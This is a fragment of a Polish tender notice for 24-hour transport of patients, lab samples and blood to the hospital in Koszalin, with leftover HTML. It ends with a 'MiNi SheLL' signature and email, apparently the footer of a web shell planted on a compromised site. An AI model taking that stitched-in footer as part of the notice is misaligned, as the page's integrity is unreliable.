Jest to przewóz chorych  do Szpitala Wojewódzkiego w Koszalinie  w celu przeprowadzenia diagnostyki, przewóz badań do Laboratorium i odbiór wyników  oraz transport krwi. Czasami występuje usługa przewozu pacjenta, jeżeli zadecyduje lekarz do domu. Średnio w miesiącu występuje 100 - 110 wyjazdów dot. przewozu chorych i materiałów do badań oraz transportu krwi.
 Wykonawca zobowiązany będzie do świadczenia usługi w dni robocze, soboty, niedziele i święta, przez  całą dobę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com